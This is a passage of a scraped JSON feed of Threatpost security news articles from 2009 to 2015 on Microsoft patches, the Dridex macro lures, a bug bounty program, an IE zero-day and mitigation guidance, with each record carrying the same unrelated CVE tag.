Security Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-20T21:47:47", "id": "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "href": "https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:50", "description": "Some users who have installed the [MS14-066 patch](<https://threatpost.com/microsoft-schannel-bug-latest-in-long-line-of-serious-crypto-flaws/109321>) that fixes a vulnerability in the Schannel technology in Windows are having issues with the fix causing TLS negotiations to fail in some circumstances.\n\nThe problem arises when users have TLS 1.2 enabled in certain configurations and it will sometimes cause processes to hang or become unresponsive from time to time. Microsoft said it\u2019s aware of the issue and is recommending that users who run into the problem disable support for several of the new cipher suites that the MS14-066 patch adds to Windows.\n\n\u201cWe are aware of an issue in certain configurations in which TLS 1.2 is enabled by default, and TLS negotiations may fail. When this problem occurs, TLS 1.2 connections are dropped, processes hang (stop responding), or services become intermittently unresponsive,\u201d Microsoft said in a Knowledge Base [article](<https://support.microsoft.com/kb/2992611>).\n\nMicrosoft recommends that users delete these ciphers from the registry:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nThe MS14-066 patch fixes a vulnerability in every supported version of Windows that involves the way that Schannel handles certain requests. Schannel is the SSL/TLS implementation in Windows and the vulnerability is remotely exploitable.\n\n\u201cA remote code execution vulnerability exists in the [Secure Channel (Schannel)](<https://technet.microsoft.com/en-us/library/security/dn848375.aspx#Schannel>) security package due to the improper processing of specially crafted packets. Microsoft received information about this vulnerability through coordinated vulnerability disclosure. When this security bulletin was issued,** **Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers. The update addresses the vulnerability by correcting how Schannel sanitizes specially crafted packets,\u201d Microsoft said in its [advisory](<https://technet.microsoft.com/library/security/MS14-066>).\n", "cvss3": {}, "published": "2014-11-17T09:30:34", "type": "threatpost", "title": "Issues Arise With MS14-066 Schannel Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T19:54:58", "id": "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "href": "https://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "description": "Not long ago, criminals pushing the Dridex banking Trojan were using [Microsoft Excel documents spiked with a malicious macro](<http://threatpost.com/dridex-banking-trojan-spreading-via-office-macros/110255>) as a phishing lure to entice victims to load the malware onto their machines.\n\nEven though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure.\n\nResearchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users\u2019 trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines.\n\nThe XML files are passed off as \u201cremittance advice,\u201d or payment notifications, with the hopes that some users will believe it\u2019s an innocent text file and execute the malicious code.\n\n\u201cXML files are the old binary format for Office docs and once you double click them to open, the file associated with Microsoft Word and opens,\u201d said Karl Sigler, Trustwave threat intelligence manager. The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to viewed properly or to ensure proper security. \u201cWhich is the exact opposite of what this does,\u201d Sigler said. \u201cIt doesn\u2019t seem to be all that sophisticated. They\u2019re either trying to capitalize on a user\u2019s trust in XML files, or the fact that a user may not be that familiar with what that extension is.\u201d\n\nIf the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visiting an online banking site and then injects code onto the bank site in order to capture the user\u2019s credentials for their online account.\n\nSigler said this is the first time they\u2019ve spotted XML docs used as a lure. As for macros, they\u2019ve been disabled by default since Office 2007 was released.\n\n\u201cSometimes in large organizations, local administrators have the ability to enable macros,\u201d Sigler said. \u201cSome organizations use them quite a bit, but it\u2019s not common. Most people leave the default settings. It\u2019s hard to say why these guys moved to XML. It could be that they\u2019re looking for a new attack vector and they weren\u2019t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they\u2019re looking for a way to better their success rate.\u201d\n\nDridex is a descendent of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.\n", "cvss3": {}, "published": "2015-03-06T13:38:40", "type": "threatpost", "title": "Dridex Banking Trojan Spreading Via Macros in XML Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-10T11:23:01", "id": "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "href": "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousands of dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500,and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "[](<https://threatpost.com/microsoft-expected-patch-pwn2own-ie-vulnerabilities-040413/>)Appropriately enough for the start of the baseball season, Microsoft is going to go 4-for-4 and release another set of critical Internet Explorer patches on Tuesday, the fourth consecutive month in which serious vulnerabilities in the browser are being addressed in Microsoft\u2019s Patch Tuesday monthly security updates.\n\nThe browser patches are expected to address vulnerabilities first brought to light and exploited last month during the [Pwn2Own contest](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) at the CanSecWest Conference. All three major browsers\u2014IE, Mozilla Firefox and Google Chrome\u2014were taken down with zero-day exploits during the contest. [Mozilla and Google issued patches for the vulnerabilities](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>) within 24 hours. IE users have been exposed since the March 7 contest, however details on the IE bugs have not been publicly disclosed.\n\n\u201cEven with their new, more aggressive IE patch cadence they\u2019re still behind other browsers that don\u2019t stick to a monthly patch schedule,\u201d said Andrew Storms, director of security operations at security company nCircle. \u201cThis probably isn\u2019t a huge problem for enterprise security teams because the bug hasn\u2019t been publicly released.\u201d\n\nIE has been a vehicle for many noteworthy attacks this year, including a series of [watering hole attacks](<https://threatpost.com/ie-zero-day-watering-hole-attack-expands-handful-political-sites-010313/>) against human rights and political organizations that exploited zero-day vulnerabilities in IE. Those vulnerabilities were patched in an out-of-band security update.\n\n[Next week\u2019s patches](<http://technet.microsoft.com/en-us/security/bulletin/ms13-apr>) address remote code execution vulnerabilities rated critical in IE 10 on Windows 8 systems, IE 8 and 9 on Windows 7, IE 7 and 8 for Vista and IE 6, 7 and 8 on Windows XP.\n\nThe [out-of-band patch](<https://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/>) fixed memory corruption vulnerabilities in the browser that were exploited in watering hole attacks against the Council of Foreign Relations website, as well as number of manufacturing and human rights sites. The emergency repair was necessitated when hackers were able to bypass a Fix It mitigation provided by Microsoft.\n\nShortly thereafter [in February\u2019s security update release](<https://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/>), additional IE vulnerabilities in versions 6-10 were patched, including one being exploited in the wild.\n\nLast month, [Microsoft released a cumulative update for the browser](<https://threatpost.com/critical-ie-windows-kernel-flaws-patched-031213-0/>), and came a few days after IE 10 running on a Windows 8 machine was compromised at Pwn2Own. The IE patches repaired nine use-after free vulnerabilities, one of which was being exploited in targeted attacks.\n\nThe IE update is one of two critical bulletins expected next week. The second addresses remote code execution vulnerabilities in Windows.\n\nSeven other bulletins are expected next week, all of them rated important, including an information disclosure flaw in Microsoft Office and Microsoft SharePoint Server 2013, the company said.\n\nThe remaining important bulletins are privilege escalation vulnerabilities in Windows, Microsoft Office Web Apps 2010 Service Pack 1, Microsoft SharePoint Server 2010 Service Pack 1, Microsoft Groove Server 2010 Service Pack 1 and Windows Defender for Windows 8 and Windows RT.\n\n\u201cThe number of bulletins isn\u2019t the only factor IT security teams consider when they review a patch so, even though the overall patch count is a little higher than average this month and only two of the bulletins merit a critical rating, it\u2019s too early to assume it\u2019s going to be an easy month,\u201d Storms said.\n", "cvss3": {}, "published": "2013-04-04T18:44:53", "type": "threatpost", "title": "Microsoft Expected to Patch Pwn2Own IE Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T17:45:39", "id": "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "href": "https://threatpost.com/microsoft-expected-patch-pwn2own-ie-vulnerabilities-040413/77700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:18", "description": "SAN FRANCISCO\u2013The concept of threat modeling has evolved quite a lot in the last few years, moving from an activity that massive software companies such as Microsoft and Google use to anticipate and defend against potential threats to their products to something that many smaller organizations practice. Starting a threat modeling system can seem daunting, but the good news is that there\u2019s no one right way to do it, just the right way for a given organization.\n\nMicrosoft has been using some form of threat modeling internally for many years now and the company\u2019s security group has spent a lot of time speaking publicly about the benefits of the practice and advocating for wider adoption of it. [Adam Shostack](<https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705>), a program manager in Microsoft\u2019s Trustworthy Computing group, has been one of the main proponents of threat modeling\u2019s use, and he said that he\u2019s reached the conclusion that threat modeling is not one defined set of methods or principles but a fluid and dynamic way of reducing security risks to products and services.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d he said during a talk at the RSA Conference here Wednesday. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n\nSecurity experts often will tell developers that in order to build defensible and resilient products, they need to think like an attacker. That is, look at the product or system the way that a potential adversary would see it, find the weak spots that are ripe for exploitation and correct them. But Shostack said that isn\u2019t exactly the most useful advice.\n\n\u201cBeing told to think like an attacker is like being told to think like a professional chef,\u201d said Shostack, who recently published a new [book](<http://threatmodelingbook.com/>) on the topic, _Threat Modeling: Designing for Security_. \u201cA lot of security people like to cook, but if someone told you to go to the store and buy enough chickens for a restaurant that seats 78 people and turns over three times a night, you\u2019d have no idea what to do.\u201d\n\nAs with nearly everything in security these days, there are a number of methodologies, models, checklists and other aids designed to help organizations implement threat modeling. Those tools can be useful and have their places, Shostack said, but none of them should be seen as the perfect answer. Rather, use them as part of the process of putting building blocks in place as you construct a threat modeling program.\n\n\u201cWe want to focus on finding good threats. Use your assets and the actions of attackers to make threats real,\u201d he said. \u201cIt\u2019s hard to go from a checklist to a broader system. You have to think about threat modeling your software as an end-to-end process.\u201d\n\nOf course, even the best and most well-constructed threat modeling program still has to deal with the most unpredictable and dangerous threat to the product: the end user. Trying to predict how users will misuse, abuse and break a piece of software is a fool\u2019s errand, but Shostack said it\u2019s still up to the professionals to put their products in the best position to survive in today\u2019s environment.\n\n\u201cTo tell people that they can\u2019t use their computers for what they want it a battler we\u2019re going to lose over and over again,\u201d he said. \u201cPeople don\u2019t buy their computers to be secure. They buy them to watch dancing babies.\u201d\n", "cvss3": {}, "published": "2014-02-26T14:14:34", "type": "threatpost", "title": "Threat Modeling, Legos and Dancing Babies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-03T22:04:34", "id": "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "href": "https://threatpost.com/threat-modeling-legos-and-dancing-babies/104517/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "Dennis Fisher talks with Ryan Naraine about whether exploit mitigations such as ASLR and DEP really make any difference in preventing browser attacks and the seriousness of the MS12-020 RDP vulnerability that was patched during March\u2019s Patch Tuesday release.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/03/07052332/digital_underground_951.mp3>\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2012-03-15T20:33:31", "type": "threatpost", "title": "Ryan Naraine on Exploit Mitigations and the MS12-020 RDP Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:32:37", "id": "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "href": "https://threatpost.com/ryan-naraine-exploit-mitigations-and-ms12-020-rdp-bug-031512/76335/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:41", "description": "Microsoft has announced it will issue nine bulletins for its July Patch Tuesday release next week. Included in the update are three critical patches for security holes that, if left unaddressed, could result in remote code execution on vulnerable systems.\n\nIn all, the Redmond, Washington company will address 16 vulnerabilities in Microsoft Windows, Internet Explorer, Microsoft Office, and the Server Software and Developer Tools products.The bulk of the releases \u2013 six updates \u2013 are rated \u201cimportant\u201d by Microsoft, which suggests they could be used to compromise systems, but not by self-spreading malware. Most deal with elevation of privilege vulnerabilities. \n\nMicrosoft hasn\u2019t said what vulnerabilities the patches will address. However, it is possible that at least one of the patches will fix a hole in Microsoft\u2019s XML Core Services. The vulnerability, [disclosed in mid-June](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>), allows remote code execution through Internet Explorer and is being actively exploited.\n\nHere\u2019s a rundown of the bulletins:\n\nBulletin ID | \n\nMaximum Severity Rating and Vulnerability Impact\n\n| Restart Requirement | Affected Software \n---|---|---|--- \nBulletin 1 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows \nBulletin 2 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows, \nInternet Explorer \nBulletin 3 | [Critical](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | Microsoft Windows \nBulletin 4 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | May require restart | \n\nMicrosoft Office, \nMicrosoft Developer Tools \n \nBulletin 5 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Requires restart | Microsoft Windows \nBulletin 6 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nRemote Code Execution | Requires restart | Microsoft Windows \nBulletin 7 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nInformation Disclosure | Requires restart | Microsoft Windows \nBulletin 8 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | May require restart | \n\nMicrosoft Office, \nMicrosoft Server Software \n \nBulletin 9 | [Important](<http://go.microsoft.com/fwlink/?LinkId=21140>) \nElevation of Privilege | Does not require restart | Microsoft Office \n \nThis is the first monthly patch release to use a new and improved version of Windows Update that fixes a vulnerability previously used by the Flame malware. [News broke last month that the malware used a forged Microsoft certificate](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>) to validate its components, impersonating a Windows Update mechanism and installing malicious code in its place.\n\nAs usual, Microsoft will push the patches next Tuesday, July 10, around 1 p.m. EST. Those looking for more information on the updates should read Microsoft\u2019s advance notification on [Technet](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-06T15:03:10", "type": "threatpost", "title": "Microsoft Plans To Fix 16 Vulnerabilities With July Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:54", "id": "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "href": "https://threatpost.com/microsoft-plans-fix-16-vulnerabilities-july-patch-release-070612/76774/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "Microsoft announced yesterday that it will complement the [two-factor authentication](<http://threatpost.com/microsoft-reportedly-adding-two-factor-authentication-user-accounts-041013>) it enabled for account holders in April with [additional security features](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-features-added-to-microsoft-accounts.aspx>) designed to deny account hijacking and unauthorized access.\n\nWindows PC and mobile users, along with Outlook, SkyDrive, Xbox, Skype and other Microsoft services users will soon have three new capabilities to further prop up their accounts.\n\nThe most novel may be a dashboard view that presents a user with a log of recent activity, such as log-in attempts\u2014including failed attempts\u2014as well as the addition or deletion of security information and the type of device and browser used for a particular activity. Location is displayed on a map, as well as timestamp data.\n\n\u201cYou know best what\u2019s been happening with your account \u2013 so the more we give you tools to understand what\u2019s happening, the better we can work together to protect your account,\u201d wrote Eric Doerr, a group program manager at Microsoft. \u201cFor example, a login from a new country might look suspicious to us, but you might know that you were simply on vacation or on a business trip.\u201d\n\nUsers who determine there has been suspicious or unauthorized activity can click on a \u201cThis wasn\u2019t me\u201d button that will then display steps the user can take to secure their accounts.\n\nIn addition, users who have already enabled [two-factor authentication](<http://blogs.technet.com/b/microsoft_blog/archive/2013/04/17/microsoft-account-gets-more-secure.aspx>) will be able to generate a recovery code to access their accounts without having to use the information provided during the setup of two-factor.\n\n\u201cBecause two-step verification setup requires two verified pieces of security information, like a phone number and email address, it will be a rare occasion when both options fail, but in the event they do, we\u2019ve got you covered,\u201d Doerr said.\n\nMicrosoft said that any account user will be add a recovery code to their account, but users will be able to request only one recovery code at a tme; requesting a new one cancels the old one, Doerr said.\n\n\u201cYour recovery code is like a spare key to your house,\u201d Doerr said. \u201cSo make sure you store it in a safe place.\u201d\n\nThe final new feature users may expect is additional management of security notifications, such as password resets. Users will be able to select, for example, whether they want security notifications send to an email address or a mobile device via text message.\n\nMicrosoft account holders have had two-factor authentication at their disposal since April. Users are asked to provide two pieces of security information that Microsoft stores; the user will enter a password, for example, and then have a code sent to their mobile device as a second authenticator.\n\nMicrosoft also released an Authenticator app for Windows Phone; the app is built on a standard authentication protocol meaning that it could be used on other Web-based services such as those offered by Google, Dropbox and others.\n", "cvss3": {}, "published": "2013-12-10T08:00:18", "type": "threatpost", "title": "Microsoft Protects User Accounts with New Security Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-10T00:55:21", "id": "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "href": "https://threatpost.com/microsoft-adds-new-security-features-to-accounts/103138/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:06", "description": "Microsoft has released some [updated guidance on the recent DLL-hijacking bug](<http://blogs.technet.com/b/srd/>), including a new FixIt tool that enables the workaround for the vulnerability that Microsoft shipped late last month. \n\nThe new guidance includes a detailed explanation of the bug itself as well as how potential attacks would work and what users can do to protect themselves. In a blog post, Jonathan Ness of the Microsoft Security Response Center Engineering Team, explained that there are a number of different potential attack vectors, including a WebDAV share.\n\n\u201cUnfortunately, based on attack patterns we have seen in recent years, \nwe believe it is no longer safe to browse to a malicious, untrusted \nWebDAV server in the Internet Zone and double-click on **_any_** \ntype of files. Attackers are clever, substituting dangerous file icons \nwith safe, trusted file icons. They have even recently begun obfuscating \nthe filename based on character encoding tricks (such as right-to-left \ncharacter encoding). Their goal is to entice unsuspecting users into \ndouble-clicking on a malicious executable. With or without this new \nremote vector to the DLL Preloading issue, it\u2019s very hard to make a \ntrust decision given the amount of control an attacker has over the \nmalicious WebDAV server browsing experience. We recommend users only \ndouble-click on file icons from WebDAV shares known to be trusted, safe, \nand not under the control of a malicious attacker,\u201d Ness said.\n\nThe company has released a workaround for the DLL bug, which involved editing the registry to create a new entry. The solution also includes a downloadable tool. But the tool was turned off by default, fo Microsoft has now published a new FixIt tool that will automatically enable it.\n\nHere are the steps that Microsoft recommends:\n\n * Install the tool from [KB2264107](<http://support.microsoft.com/kb/2264107>).\n * Log on to your computer as an administrator. \n * Open Registry Editor. \n * Locate and then click the following registry subkey: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager\n * Right-click Session Manager, point to New, and then click Dword Value.\n * Type CWDIllegalInDllSearch, and then click Modify. \n * In the Value data box, type 0xFFFFFFFF, and then click OK.\n\nThe company warns that there could be unforeseen issues, so users should test the fix before deploying it. \n", "cvss3": {}, "published": "2010-09-01T13:38:15", "type": "threatpost", "title": "Microsoft Publishes New FixIt Tool For DLL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:11", "id": "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "href": "https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/74409/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, \nwhich could be exploited by attackers to compromise a vulnerable \nsystem. This issue is caused by a dangling pointer in the Microsoft \nHTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via \nthe \u201cgetElementsByTagName()\u201d method, which could allow attackers to \ncrash an affected browser or execute arbitrary code by tricking a user \ninto visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Dennis Fisher and Mike Mimoso talk about the end of the Patch Tuesday era for most Microsoft customers, the appeals court ruling on Section 215 metadata collection and Dennis\u2019s idea for a security industry commission.\n\nDownload: [digital_underground_201.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_201.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-08T12:12:40", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on the End of the Patch Tuesday Era, Section 215 and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T16:39:21", "id": "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "href": "https://threatpost.com/threatpost-news-wrap-may-8-2015/112705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:47", "description": "[](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>)Ryan Smith, one of the researchers who found the bug in the Microsoft MsVidCtl DLL that the vendor is rushing to patch this week, has posted a [short video demonstration](<http://www.hustlelabs.com/bh2009preview/>) of a technique that bypasses the stop-gap solution of preventing the vulnerable ActiveX control from loading.\n\nIn the demo, Smith, a former researcher with IBM ISS who will be giving a talk on the exploit at the Black Hat conference later this week with Mark Dowd and David Dewey, shows that setting the killbit on the vulnerable control, as Microsoft and others suggested, is not sufficient to prevent exploitation. The demo shows Smith using a new tool called Killbit Visualizer to log the IDs of killbits that are specifically allowed or denied.\n\nHe is then able to get around the killbit protection on the vulnerable video control and cause the calculator to start on the machine.\n\nSmith\u2019s demo comes on the heels of a [blog post by Halvar Flake](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>), a well-known security researcher, who pointed out nearly three weeks ago that simply setting the killbit was not going to protect users against the MsVidCtl flaw. From his post:\n\nSo, where does this leave us ?\n\n 1. The bug is actually much 